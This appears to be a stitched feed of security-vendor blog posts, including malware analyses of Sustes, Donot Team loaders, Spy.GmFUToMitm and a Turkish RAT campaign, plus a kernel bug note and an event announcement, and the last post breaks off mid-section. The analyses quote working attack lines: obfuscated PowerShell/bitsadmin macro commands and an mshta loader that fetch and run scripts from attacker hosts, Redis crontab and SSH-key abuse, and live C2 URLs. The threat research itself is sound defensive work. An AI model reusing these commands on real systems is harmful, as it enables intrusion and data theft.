Here is the Coccinelle output:

./drivers/block/floppy.c:3756:49-52: function "compat_getdrvprm" has arg "arg"
of type "struct compat_floppy_drive_params __user *"
./drivers/block/floppy.c:3783:5-19: copy_from_user uses "arg" as the
destination. What a shame!

./drivers/block/floppy.c:3789:49-52: function "compat_getdrvstat" has arg "arg"
of type "struct compat_floppy_drive_struct __user *"
./drivers/block/floppy.c:3819:5-19: copy_from_user uses "arg" as the
destination. What a shame!

So there are two (not very dangerous) kernel vulnerabilities that fit this bug pattern.

Public zero-days

It turned out that I was not the first to find these bugs. Jann Horn reported them in March 2019. He used sparse to find them. I'm absolutely sure that it can find many more error cases than my PoC Coccinelle rule.

But in fact, Jann's patch was lost and it didn't get into the mainline.
So these two bugs could be called "public zero-days" :-)

Anyway, I've reported this issue to LKML, and Jens Axboe will apply Jann's lost patch for Linux kernel v5.4.

Author: Alexander Popov, Positive Technologies

Sustes malware updated to spread via vulnerability in Exim (CVE-2019-10149)

$
0
0
A new wave of attacks by the Sustes cryptominer is infecting computers via a June vulnerability in the Exim mail server. Starting on August 11, our PT Network Attack Discovery network sensors have detected attempts to exploit mail servers in incoming network traffic.



Scanning is performed from address 154.16.67[.]133. The command in the RCPT TO field triggers download of a malicious bash script at address http://154.16.67[.]136/main1. A chain of scripts installs the XMR miner on the host and adds the miner in crontab. One script adds a public SSH key to the authorized_keys list of the current user. The attackers are subsequently able to obtain SSH access to the system, no password required.

In addition, Sustes attempts to spread via SSH to other hosts from the known_hosts list. The connection to them is presumed to occur automatically via public key. Then the process of infection repeats itself on accessible SSH hosts.


Sustes has another method of spreading as well. It runs a chain of Python scripts, the last of which (http://154.16.67[.]135/src/sc) contains a scanner for random Redis servers. This script also adds itself to crontab for autorun and places its own key in the list of trusted SSH keys on vulnerable Redis servers:

x = s2.connect_ex((self.host, 6379))

stt2=chkdir(s2, '/etc/cron.d')
rs=rd(s2, 'config set dbfilename crontab\r\n')
rs=rd(s2, 'config set dbfilename authorized_keys\r\n')
stt3=chkdir(s2, '/root/.ssh')

Getting rid of Sustes isn't difficult: delete the malicious files and scripts listed below, and eliminate malicious entries from crontab and known_hosts. Sustes also exploits other vulnerabilities for infection, such as one in Hadoop YARN ResourceManager, and bruteforces accounts.

IoCs:

Filenames
/etc/cron.hourly/oanacroner1
/etc/cron.hourly/cronlog
/etc/cron.daily/cronlog
/etc/cron.monthly/cronlog
sustse
.ntp
kthrotlds
npt
wc.conf

Urls
http://154.16.67.135/src/ldm
http://154.16.67.135/src/sc
http://107.174.47.156/mr.sh
http://107.174.47.156/2mr.sh
http://107.174.47.156/wc.conf
http://107.174.47.156/11
http://154.16.67.136/mr.sh
http://154.16.67.136/wc.conf

Custom Monero Pools
185.161.70.34:3333
154.16.67.133:80
205.185.122.99:3333

Wallet
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

SSH Public key
AAAAB3NzaC1yc2EAAAADAQABAAAsdBAQC1Sdr0tIILsd8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx AHyvBL8jDZDJ6fuVwEB aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH

MD5
95e2f6dc10f2bc9eecb5e29e70e29a93
235ff76c1cbe4c864809f9db9a9c0c06
e3363762b3ce5a94105cea3df4291ed4
e4acd85686ccebc595af8c3457070993
885beef745b1ba1eba962c8b1556620d
83d502512326554037516626dd8ef972

Script files
Main1 https://pastebin.com/a2rgcgt3
Main1 py snippet https://pastebin.com/Yw2w6J9E
src/sc https://pastebin.com/9UPRKYqy
src/ldm https://pastebin.com/TkjnzPnW

Positive Technologies Brings ‘Hackable City’ to Life in The Standoff Cyberbattle at HITB+ CyberWeek

$
0
0
Attackers and defenders to face off in digital metropolis security challenge featuring real-world critical infrastructure and technologies.


Cybersecurity experts at Positive Technologies and Hack In The Box are inviting red and blue team security specialists to test their skills attacking and defending a full-scale modern city at The Standoff Cyberbattle held during HITB+ CyberWeek. This mock digital metropolis with full IT and OT infrastructure including traffic systems, electrical plants, and transportation networks will feature all the latest technologies used in actual critical infrastructure installations, allowing players to expose security issues and the impact they might have on the real world.

The city will include electricial power plants, freight and passenger carriers, petrochemical facilities, and banks. The infrastructure of each ‘company’ is built using the exact same technologies applied in their respective field such as ICS/SCADA systems.

Defenders (blue teams) will be tasked with protecting vulnerable services from attackers (red teams).

“We've been working on the Standoff for almost 10 years now. We started with specialized trainings for information security experts and CTF players, but then understood that bringing our expertise even closer to the realities of life is a must to maximize the cyberbattle's practical value. This full-fidelity representation of the arms race between hackers and security specialists is a highlight and audience favorite at PHDays conference, which has been held in Moscow since 2011," said Gregory Galkin, Head of Cyberbattle Business Development at Positive Technologies. "Now, we are bringing this unique format to Hack In The Box, one of the world's best-regarded security conferences.”

Dhillon Kannabhiran, Founder and CEO of Hack In The Box, said: "The Standoff is one of the most challenging attack and defense contests in the world, where teams are competing to find vulnerabilities and attack vectors in real-world critical infrastructure. We've already invited the 2018 and 2019 winners from The Standoff at PHDays to compete in our PRO CTF Finals and we’re excited to now additionally host The Standoff itself at our inaugural HITB+ CyberWeek event in Abu Dhabi."

The Standoff is not a normal Capture the Flag (CTF) game and will require teams to have specific skill sets commonly seen in security professionals. The simulation brings real-world problems to life and will enable industry professionals to hone their protection and monitoring skills.

HITB+ CyberWeek will take place at the Emirates Palace in Abu Dhabi on October 12–17, 2019. The Standoff itself will be held on October 15–17 and members of the media, the public, and those interested in seeing real-world hacking are encouraged to attend. More on the contest can be found at https://cyberweek.ae/competitions/standoff/ and using an official hashtag #HITBCyberWeek on social media.

Studying Donot Team

$
0
0

APT group called Donot Team (aka APT-C-35, SectorE02) has been active since at least 2012. The attackers hunt for confidential information and intellectual property. The hackers' targets include countries in South Asia, in particular, state sector of Pakistan. In 2019, we noticed their activity in Bangladesh, Thailand, India, Sri Lanka, the Philippines, and outside of Asia, in places like Argentina, the United Arab Emirates, and Great Britain.

For several months, we have been monitoring changes in the code of this group's malicious loaders. In this article, we will review one of the attack vectors, will talk about the loaders in more detail, and will touch upon the peculiarity of the network infrastructure.

Attack chain

At the early stage of infection, the victim receives an MS Word document in Office Open XML format. Even though we do not have clear evidence, we are sure that the initial penetration vector is a targeted phishing message with MS Office attachment. The document itself is not malicious, but it abuses the external elements autoloading capability to launch the next stage document.

Communicating with a linked external object
The loaded fine is an RTF document exploiting vulnerability CVE-2018-0802 in Microsoft Equation. The main shellcode is preceded by a chain of intermediate ones, each decrypting the subsequent slice with a single-byte XOR with keys 0x90 and 0xCE.

First shellcode decrypting the second one
Second shellcode decrypting the third one
Third shellcode decrypting the main one
The main shellcode performed the following actions:


  • Uses a single-byte XOR with key 0x79 to decrypt binary data from file %TEMP%\one.
  • Creates executable files C:\Windows\Tasks\Serviceflow.exe and C:\Windows\Tasks\sinter.exe. These are the group's malicious loaders. We will talk more about them later.
  • Creates file C:\Windows\Tasks\S_An.dll, containing two bytes 0x90.
  • Creates file C:\Windows\Tasks\A64.dll. Depending on the system bit capacity, this is a modified x64-bit or x86-bit version of UACMe utility escalating privileges in the system. In addition to bypassing UAC control, the library creates and launches BAT script %TEMP%\v.bat. The script will use the following commands to register one of the loaders created earlier as a service:


sc create ServiceTool displayname= "ServiceFill" binpath= "C:\Windows\Tasks\Serviceflow.exe" start= "auto"
sc start ServiceTool

Decrypting BAT scripts in modified UACMe libraries

  • Creates and launches JScript script C:\Windows\Tasks\bin.js. Its task is to launch library A64.dll via RnMod export using rundll32.
  • Creates shortcut WORDICON.lnk in the startup folder. Its task is to launch loader sinter.exe after system restart.
  • Creates shortcut Support.lnk in the startup folder. Its task is to launch bin.js JScript script after system reboot.

Decompiled code of the main shellcode

So, at that stage there are two loaders with a firm foothold in the System. We will discuss their operation later on.

Lo2 loaders

Despite their classification, the trojans have different objectives. For instance, file Serviceflow.exe acts as a watchdog. It collects the following information about the system:

  • Username
  • Computer name
  • Contents of \Program Files\ and \Program Files (x86)\
  • OS version
  • Data about the processor

The watchdog records the results in file log.txt. It also checks Windows\Tasks\ for files A64.dll and sinter.exe. If necessary, it downloads the files from control server skillsnew[.]top and launches them on behalf of the current user. The corresponding token is extracted from process winlogon.exe. Trojan sinter.exe lets the attackers know about the infection by sending a request to hxxps://mystrylust.pw/confirm.php, and sends the collected information about the system to skillsnew[.]top. Then, if the attackers are still interested in the victim's computer, the trojan obtains contents of customer.txt file at hxxp://docs.google.com/uc?id=1wUaESzjGT2fSuP_hOJMpqidyzqwu15sz&export=download. The file contains the name for control server car[.]drivethrough.top, with which the trojan communicates further. Downloaded files are placed in folder \AppData\Roaming\InStore\, and launched with task scheduler.

Decrypted strings of command fragments and task template
As a result of malicious loaders' activity, components of framework yty are inserted into the system, allowing the attackers to get more details about their victim, including files with a certain extension, intercepted input strings, list of processes, and screenshots. We will not discuss plugins in this article.
When we studied other similar samples, we found some paths and project names left in the debugging information including the following:


  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\New_Single_File\Lo2\SingleV2\Release\BinWork.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\New_Single_File\Lo2\SingleV2_Task_Layout_NewICON\Release\BinWork.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\New_Single_File\Lo2\SingleV2_Task_Layout_NewICON_N_Lnk\Release\BinWork.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\New_Single_File\Lo2\SingleV3\Release\WorkFile.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\Off\Off_New_Api\Release\C++\ConnectLink.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\Off\Off_New_Api\Release\C++\TerBin.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\yty 2.0 - With AES Chunks LOC FOR XP Just Bit-Change_Name\Release\TaskTool.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\yty 2.0 - With AES Chunks OFFS Just Bit\Release\C++\MsBuild.pdb
  • D:\Soft\DevelopedCode_Last\yty 2.0\Release\C++\Setup.pdb

In addition to substring yty 2.0 connecting the trojans with the framework, we also noticed substring Lo2, which may be an abbreviation from Loader 2.

In loaders versions before mid-2018, all used strings were stored in the file in cleartext. In subsequent builds, the attackers started encrypting the strings. In different versions, the following changes were made to the algorithm:


  • Since May 2018: reverse the string and encode with Base64
  • Since April 2019: perform the previous actions twice.
  • Since January 2019: encrypt the string with AES in CBC mode and encode with Base64. Sample of Python code for decryption:

import base64
from Cryptodome.Cipher import AES

aeskey = (0x23, 0xd4, 0x67, 0xad, 0x96, 0xc3, 0xd1, 0xa5, 0x23, 0x76, 0xae, 0x4e, 0xdd, 0xca, 0x13, 0x55)

def aes_decrypt(data, aeskey):
iv = bytes(list(range(0, 16)))
key = bytes(aeskey)
aes = AES.new(key, AES.MODE_CBC, iv)
return aes.decrypt(data).decode().strip('\x00')

def base64_aes_decrypt(data, aeskey):
data = base64.b64decode(data)
data = aes_decrypt(data, aeskey)
return data


  • Since June 2019: perform symbol-by-symbol circular subtraction with the set array of bytes, encode with UTF-8, and encode with Base64. Sample of Python code for decryption:

subgamma = (0x2d, 0x55, 0xf, 0x59, 0xf, 0xb, 0x60, 0x33, 0x29, 0x4e, 0x19, 0x3e, 0x57, 0x4d, 0x56, 0xf)

def sub_decrypt(data, subgamma):
o = ''
length = len(data)
subgamma_length = len(subgamma)
for i in range(length):
o += chr((0x100 + ord(data[i]) - subgamma[i%subgamma_length]) & 0xff)
return o

def base64_utf8_sub_decrypt(data, subgamma):
data = base64.b64decode(data)
data = data.decode('utf-8')
data = sub_decrypt(data, subgamma)
return data


  • Since October 2019: perform symbol-by-symbol circular modified XOR with the set array of bytes, and encode with Base64 twice. The peculiarity of XOR algorithm is that if the string symbol value matches the value of the symbol in the set array of bytes, XOR is not required. Sample of Python code for decryption:

xorgamma = (0x56, 0x2d, 0x61, 0x21, 0x16)

def modxor_decrypt(data, xorgamma):
o = ''
length = len(data)
xorgamma_length = len(xorgamma)
for i in range(length):
c = data[i]
if c != xorgamma[i%xorgamma_length]:
c = data[i] ^ xorgamma[i%xorgamma_length]
o += chr(c)
return o

def base64_modxor_decrypt(data, xorgamma):
data = base64.b64decode(data)
data = modxor_decrypt(data, xorgamma)
return data

When we were writing the decryption script, we found that some strings couldn’t be decrypted. But then we found that these lines can still be decrypted with one of the decryption methods mentioned earlier. After we verified that each sample uses only one decryption method, we concluded that the attackers had simply forgotten to delete unused strings or replace them with those correctly encrypted for the next version of the malware.

Strings in one of the loader samples were encrypted with various methods, but only one is used in the executable file.
Such mistakes are always advantageous for the researchers. For instance, the strings left by the attackers often contained the attackers' control servers which we did not know about before.

Network Infrastructure peculiarities

To complete the picture, we want to point out some typical features which can help you make a connection between the group's attacks in the future.


  • Most of the control servers are rented from DigitalOcean, LLC (ASN 14061), and are located in Amsterdam.
  • The attackers do not use the same servers for different DNS names. They prefer reserving a new allocated host for each new domain name.
  • In most cases, domain owners' registration information is hidden with privacy services. The attackers can use the following services: WhoisGuard, Inc.; Whois Privacy Protection Service, Inc.; Domains By Proxy, LLC; and Whois Privacy Protection Foundation. In some cases the data is accessible, and we can see the common approach to filling the fields.

WHOIS information about domain burningforests[.]com
WHOIS information about domain cloud-storage-service[.]com

  • Most commonly, the attackers use .top, .pw, .space, .live, and .icu TLD.

Conclusion

Donot Team is known to use their own tools at every stage of the attack. On the one hand, the group uses various techniques to make code analysis more difficult, but on the other hand, it does not attempt to hide or disguise their actions in the system. Multipleattacks on the same targets can be indicative of particular interest in the chosen range of victims. This can also mean that the used tactics and techniques are not very efficient.

Author: Alexey Vishnyakov, Positive Technologies

IOCs

6ce1855cf027d76463bb8d5954fcc7bb — loader in MS Word format
hxxp://plug.msplugin.icu/MicrosoftSecurityScan/DOCSDOC
21b7fc61448af8938c09007871486f58 — dropper in MS Word format
71ab0946b6a72622aef6cdd7907479ec — loader Lo2 in C:\Windows\Tasks\Serviceflow.exe
22f41b6238290913fc4d196b8423724d — loader Lo2 in C:\Windows\Tasks\sinter.exe
330a4678fae2662975e850200081a1b1 —modified x86 version of UACMe
22e7ef7c3c7911b4c08ce82fde76ec72 —modified x64 version of UACMe
skillsnew[.]top
hxxps://mystrylust.pw/confirm.php
hxxp://docs.google.com/uc?id=1wUaESzjGT2fSuP_hOJMpqidyzqwu15sz&export=download
car[.]drivethrough.top
burningforests[.]com
cloud-storage-service[.]com

Malware creators trying to avoid detection. Spy.GmFUToMitm as an example

$
0
0
Image credit Unsplash
Specialists from PT Expert Security Center found an interesting specimen of malware distributed in the Chinese segment of the Internet. Among other things, this malware is used for MITM attacks. Its main peculiar feature is that it combines various techniques of evading detection. We analyzed those to demonstrate how malware creators hide malware activity.

How it all began

Network traffic analysis system alerted us to the fact that the malicious application regularly requests an image with added content. The image was downloaded from imgsa.baidu.com, a legitimate image storage resource. In addition, we found that the picture itself was super cute. So cute that using it to hide malicious payload was pure evil.

Figure 1. The image used to hide payload delivery 
To get started, we needed to collect initial data and compare samples. Therefore, we searched for similar samples, and found a few. We could do that by using typical data in the network communication and using our large database of malicious traffic. The network traffic demonstrated an obvious pattern, a trend of the same actions repeated again and again by the malicious application.

Figure 2. Network traffic with highlighted patterns
We studied the first request. The server responded by returning encrypted configuration (see Figure 3) with addresses of images containing the payload. That data is stored at http://63634[.]top:8081/koded.

Figure 3. Encrypted configuration

Data decryption

The obtained data is decrypted using DES algorithm in electronic code book mode with key 0x6a 0x5f 0x6b 0x2a 0x61 0x2d 0x76 0x62 contained in the body of the malware. After decryption, plaintext is made of strings (see Figure 4). Each string contains a link to the image. Judging by equal MD5 hashes, the image is the same. The attackers probably placed the same data at different addresses to make their delivery process more robust.

Figure 4. Sample of decrypted loader configuration
Using the obtained data, the malicious loader then initiates image download. It cuts off the first 5120 bytes (the duckling and the puppy) and uses only the payload starting at 5121 byte.

Figure 5. Payload sample
After decryption, we obtained a new configuration in a format similar to that obtained at stage one. That was another set of links to images. This time, however, all the MD5 hashes were different, and each string had a two-symbol suffix at the end.

Figure 6. Second set of links, and suspicious suffixes

Malware operation algorithm

Now we see actual payload modules. We found that the two symbols at the end of each string are used to select a specific image and, therefore, a specific payload. The string with AD suffix is used first. That choice is preset during malware development. So the loading sequence is preset in the form of two-symbol suffixes.

Figure 7. Selecting the link with AD suffix
The downloaded image contains the malicious module. You can tell just by looking at the file size. The data is still masked as an image and is located at the same 5120-byte offset. The loader puts the extra bytes aside, extracts and checks the hash sum, and then decrypts the module named TkRep.dll into a PE file.

Figure 8. Sample of encrypted module in the image body, and its hash sum
This library is loaded into the malicious process, and first of all it checks the environment where the module is running:

Figure 9. Checking virtualization environment
It checks all running processes for processes named devenv.exe, OLLYDBG.EXE, Dbgview.exe, windbg.exe, MSDEV.exe, Delphi32.exe, E.exe, PCHunter32.exe, and PCHunter64.exe, and also checks for antivirus tools.

Figure 10. Checking processes
Then comes the standard debugging check.

Figure 11. Checking process launch in debugging mode
Checks whether open pipes include those listed in the table.


Next, it registers the infected host on the attackers' server by sending encrypted information about the infected host in a POST request in HTTP protocol.

Добавьте Figure 12. Request for registration on the attackers server
An important thing to note is that the server response always contains the same data. Moreover, the client takes into account only the code of server response.

How malware covers its activity

In accordance with the payload sequence, we move on to studying the next one. Its suffix is AR. As per the current process, the client downloads another concatenation of the image with encrypted payload from Baidu Images image storage. Then it decrypts the module and launches it in a new process with a random mane. In our opinion, this functionality makes the malicious application look harmless. Often it is a client for an online game. This was another masking technique.

Figure 13. Online game interface 
After this false maneuver, the malicious process starts gaining a foothold on the infected host. It uses a functionality similar to that of a rootkit program. For instance, introducing its own protected driver into the system.

This is how it happens. From the decrypted configuration, it selects the payload with AE suffix. That is TaskReportDLL.dll library. It has the same functions as TkRep.dll library from the previous stage: sending information on the system and checking for security tools.

Then it downloads RealWorkDll.dll library. An important function of RealWorkDll.dll is downloading a driver partially protected with VMPROTECT, and a PE file installed in the system by that driver.

Figure 14. Path to the driver's database
Next, the PE files used for driver installation are deleted, and this stage is complete.
A search using a string from the driver database lead us to repository of rootkit[.]com mirror, where we found a sample of rootkit FUTo with respective name in the path — objfre_wxp_x86.

Let us now have a closer look at the work of driver SDriverBlogx86 installed by module RealWorkDll.dll. At the first stage, client's registration data is sent to the network. POST is used as a request, but this time it is sent to port 8081. It looks like this port is used to receive data if the activity on the infected system reaches the stage of FU rootkit activation.

Figure 15. Request to C2 from the driver installed in the system
Communication with the attackers' server is encrypted. Before encryption, the data contains information on the system. Data field delimiters, representation format, and the number of fields are identical for all modules (see Figure 16).

Figure 16. Information on the system to identify the infected host
The mechanism of the driver introduced into the system is identical to the initiating loader. The difference is that this time the links to the images are requested from the port for the rootkit, and the path for storing configuration changed from /koded to /qqwe. Possibly it has something to do with qq.com and wechat.com services.

The list of modules received by the process contains a list of PE files. But in this case, instead of a two-letter suffix for payload selection, there is a key in the form of a file name at the end of the string.

Figure 17. Configuration received by the driver that got a foothold in the network

After image download, the payload is also located at 5120 byte offset. The structure of the payload for the installed driver includes the key from the previous list as a filename, and the PE file itself. Unlike the previous stage, this time the payload is not encrypted.

Figure 18. Payload received by the rootkit installed in the system
Among all payloads received at this stage, we should point out the PE file for MITM attack. Its hash sum is b9fcf48376083c71db0f13c9e344c0383bafa5b116fbf751672d54940082b99a, and the image is stored here. In the traffic, execution of this PE file can be detected by a GET request:


The received module checks for processes named devenv.exe, OLLYDBG.EXE, Dbgview.exe, windbg.exe, MSDEV.exe, Delphi32.exe, E.exe, PCHunter32.exe, and PCHunter64.exe, and processes ZhuDongFangYu, 360Safe, 360Tray. Presence of this module in the system can be detected by the presence of file C:\Windows\\Temp\5B7C84755D8041139A7AEBA6F4E5912F.dat:


In the course of work, a GET request is used to download certificates server.crt, server.key, server.der, and startcom.crt.


Names of module classes for MITM attack make the attackers' intent quite clear.

Figure 18. Names of module classes for MITM attack

Conclusion

This malware contains of a loader, the decoy file, rootkit driver, and a module for man-in-the-middle attack. The malware covertly delivers its payload using a technique of merging the data with JPEG images. Attackers register names in domain zones top, bid, and on cloud platforms, for their command servers.

The malware developers used the following methods to hide their activities:

  • Posing as a legal application
  • Posing as an image in the traffic
  • Gaining foothold as a rootkit

The discussed threat is identified by PT Network Attack Discovery as Spy.GmFUToMitm.
IOC:

1953db709a96bc70d86f7dfd04527d3d0cb7c94da276ddf8f0ef6c51630a2915
1ab1b2fe3ce0fd37a0bb0814a2cac7e974f20963800f43d2f5478fc88c83a3da
1c8dbaf0a5045e2b4a6787635ded8f51d8e89a18e398c0dd79b1b82a968df1a0
9b7082ac4165b25a3b22f2aafdd41ea5f3512a76693f6a6b3101873a9cded961
9cee3f6d6e39adfa0d4712541c070b9c2423275698be0c6cd6cd8239d8793250
b9fcf48376083c71db0f13c9e344c0383bafa5b116fbf751672d54940082b99a
df3e7b04d988cf5634ec886321cb1ac364a46181e7a63f41f0788753e52dcf34
eb67c1d69eb09e195b8333e12c41a0749e7e186c9439f1e2c30f369712ce2c12
http://63634.top/ 
http://anli.bid/
http://shangdai.bid/
http://b-blog.oss-cn-beijing.aliyuncs.com

Authors: Dmitry Makarov, Evgeny Ustinov, Positive Technologies

Turkish tricks with worms, RATs… and a freelancer

$
0
0

The Positive Technologies Expert Security Center has detected a malicious campaign active since at least mid-January 2018. The operation most focused on users from Brazil, Germany, Hungary, Latvia, the Philippines, Turkey, United Kingdom, and the USA. The long operation included use of a number of tools and techniques for infecting and controlling victim PCs. Here we will detail the stages of infection, utilities and network infrastructure used, and the digital traces that put us on the spot as the alleged hacker.

Executive summary

  • Attackers reworked and modernized a 10-year-old worm 
  • Unusual set of tools and extensive network infrastructure
  • The main suspect is a Turkish freelancer

Payload delivery

Office documents

On April 5, 2019, as part of tracking new threats, specialists at the PT Expert Security Center investigated a suspicious Microsoft Office document. The file had the .docm extension (modern Microsoft Word format with support for macros). We also know that it:
  • Was created several days prior to detection (2019-03-31)
  • Contained an image asking the user to enable macros
  • Was created on a Turkish-language system (as indicated by values of metadata fields: "Konu Başlığı" / "Subject Heading" and "Konu Ba l , 1" / "Thread Title, 1"—as translated by Google Translate)
Figure 1. Typical message for tricking victims into enabling macros
The macro code is slightly obfuscated but compact. It uses a Background Intelligent Transfer Management (BITS) PowerShell cmdlet to download and run a JScript script from the attacker's server:
Shell ("pow" & "ershe" & "ll -comm" & "and ""$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb1.js;');Start-Process -WindowStyle hidden -FilePath 'cmd.exe' -ArgumentList '/c %systemroot%\system32\wscript %temp%\bb1.js'""")
The reason for use of PowerShell as well as the unusual module for downloading files from the web server is to evade restrictions on opening and running untrusted programs.

There are some similar documents. One of them is a .doc file (old Microsoft Word format) with Turkish character code page. The macro works in a very similar way:

Shell "cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND https://definebilimi.com/up3e.js %temp%\o2.js & wscript.exe %temp%\o2.js", vbHide

Here the malware author is using the same BITS technique, but now with the help of the legitimate system utility bitsadmin. Note that both the document's creation date and the time of its detection on public sources point to the middle of July 2018. So the attacks have been in progress for around a year, at a minimum. The payload is downloaded from the same attacker server, and the approach to naming the JScript script is similar too.

A different document has the extension .rtf (Rich Text Format). The file has several embedded .xls (old Microsoft Excel format) documents with identical contents. The macro code is completely identical to that from the first document. This, as well as the identical values of the code page and HeadingPairs XML field, suggests a common author.

LNK shortcuts

Not only Office documents were used for initial infection. We found a few malicious .lnk (Windows Shell Link) files that, when run, triggered execution of the following command:

C:\Windows\System32\cmd.exe /c powershell -command "$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb.js;')" & %systemroot%\system32\wscript %temp%\bb.js

The shortcuts were distributed during mid-March and late April 2019.

Their metadata contains the username win7-bilgisayar (in translation from Turkish: "win7-computer"), indicating the user of the system on which the shortcuts were created.

We can state with confidence that phishing emails were the most likely method used for delivering malicious files for initial infection.

The metamorphoses of Houdini

Minor differences aside, all the objects for the initial infection stage download and run the same JScript script. The file is not obfuscated or packed. The only step taken to confound analysis was use of random variable names. The script is a WSH backdoor with the following properties:

  • The C2 address and port are hard-coded.
  • C2 is performed via HTTP POST requests.
  • When the script starts, the string "is-bekle" (in translation from Turkish: "is-ready") is inserted in the URI field.
  • The User-Agent field contains brief information about the system with a script-defined delineator (in this case, "<|>"):
    • Hard disk serial number
    • Username
    • System version
    • Script name
    • Antivirus software name
    • Value of the %ProgramData% environment variable
    • Whether .NET Framework 4.5.2 is installed
    • Wait time between requests
    • Whether Java is installed
  • It checks whether it is running in a Kaspersky Lab sandbox based on the hard disk serial number. If the number is a match, the script stops running.
  • It gets and runs server commands, which include:
    • Downloading a file from the server
    • Uploading a file to the server
    • Stealing the clipboard contents
    • Stealing contents of a folder
    • Getting information on current processes
    • Running commands (cmd.exe)
    • Taking and sending screenshots
    • Extracting and sending stored Chrome and Opera passwords
Figure 2. Beginning of the JScript script downloaded from the attacker server
Based on the comments, code structure, command names, and format for gathering system information, we find parallels with the well-known Houdini VBS worm. In 2013, researchers at FireEye picked apart the functions of Houdini, which handles commands and collects information in a similar way. It would seem that in our case, the attacker borrowed from the well-known worm, rewrote its functions in JScript instead of VBScript, and replaced some English strings with Turkish ones for his convenience.

Figure 3. Handling of JScript backdoor commands
The strings passing the results of command execution contain "Bcorp" in their name. This same combination of letters is present in the name of the C2 server: ip1[.]bcorp.fun.

Attacker's server

According to Shodan as of April 30, 2019, the attacker's host was running an AppServ web server. The server was not locked down very well: for example, the phpinfo page (which displays configuration information of interest) was accessible. Analysis of the URLs used to download malware showed that the server has a public directory (./a) listing the attacker's other tools.

Figure 4. Home page of the attacker's server
 Figure  5. phpinfo page on the attacker's server
Figure 6. Contents of publicly available directory on the attacker's server as of late April 2019

Figure 7. Contents of publicly available directory on the attacker's server as of late May 2019
Here are descriptions of some of the files we found.

Houdini JScript

Most of all, we found a large number of variations on the modified Houdini worm we just looked at. Changes in the script from version to version were small: changes in host names (husan2.ddns.net, ip1.bcorp.fun, ip1.qqww.eu), ports (86, 87), and variable names. Particular commands appeared or disappeared. One version was even embedded in a JScript scriptlet.

Figure 8. Houdini JScript in scriptlet form

Bcorp JAR

This independently created lightweight backdoor, written in Java, uses TCP port 22122 for C2. Capabilities include:

  • Running commands in cmd.exe
  • Determining the OS version
  • Listing catalogs
  • Uploading files
  • Adding itself to the startup items folder and autostart registry key

This appears to be why the modified worm checks for the presence of Java on the system. But it is not clear why an additional backdoor would be needed if the first one has a wide range of functions.

Get-ChromeCreds

This PowerShell wrapper extracts browsing history, usernames, passwords, and cookies from Google Chrome. Some versions contain the library System.Data.SQLite.dll for x86 and x64 systems in base64 encoding; the other versions assume that the library will be present in the %APPDATA% folder. Provided as a plugin component for the main JScript backdoor.

Start-KeyLogger

This PowerShell implementation of a simple container is also provided as a plugin component for the main JScript backdoor.

Figure 9. Code fragment from the PowerShell keylogger

WebBrowserPassView

This utility from Nirsoft grabs usernames and passwords from popular browsers. The attackers used a specially tweaked version, having packed it with ASPack to complicate analysis or bypass signature detection.

NetWire RAT

This publicly available commercial remote administration tool is used by a number of cybercrime groups. In this case, obfuscation was accomplished by packing the RAT in a .NET PE file and applying DeepSea 4.1.

TCP Listen

This bare-bones GUI utility from AllScoop is used to test router and firewall settings. For each listener port it displays a string and ends the connection.

Figure 10. TCP Listen GUI

LNK loader

This tool is similar to the ones described already. When run, it performs the following command:
C:\Windows\System32\cmd.exe /v /c "set i=h&&ms!i!ta http://ip1.qqww.eu/1/f.htm"
In this case the shortcut was created under another user (desktop-amkd3n3).

Script loaders

We have put all the loaders for the already-mentioned RATs in this group. They are all small (less than 1 KB each) and in various formats (such as .htm, .xsl, and .hta). They are written in various languages, both of the scripting variety (JScript, PowerShell) and compiled-on-the-fly (C#). Here are code fragments from a few samples:

Figure 11. Fragment of the .htm loader
Figure 12. Fragment of the .xsl loader
Figure 13. Fragment of the .ps1 loader

Tiny PE loaders

Besides script loaders, we also found .NET PE files. These files, too, were small (up to 10 KB) but with similarly extensive functionality:

Figure 14. Sample of decompiled code from one of the PE loaders

xRAT

An open-source remote administration tool. Many versions and modifications are available publicly. Written in C# with partial obfuscation.

Bcorp panel and builder

Server-side component of the JScript backdoor. It also serves as the builder for the client side. A .NET PE, the component is not obfuscated or packed. The interface resembles that of a tweaked Houdini server. It can send commands plus additional components and plugins to an infected machine: Java environment, PowerShell scripts and Nirsoft utility to grab browser data, PowerShell keylogger scripts, and others. Note that the project is named BcorpRat, as can be seen in the title bar of the window in the following screenshot. The namespace of the source code contains "Btech" in its name—remember this detail for later.

Figure 15. JScript backdoor admin panel: main window
Figure 16. JScript backdoor admin panel: client-side builder window

Network infrastructure

Now we will pay a closer look at the addresses used for interaction with the attacker's malware. We will start with the domain definebilimi.com, with which the Office documents and LNK loaders communicate.

definebilimi.com

The domain changed owners on January 16, 2018. (Incidentally, "define bilimi" means "treasure of science" in Turkish.) Below are some of the most interesting WHOIS tidbits from that time.

Table 1. Information about the registrant (owner) of definebilimi.com
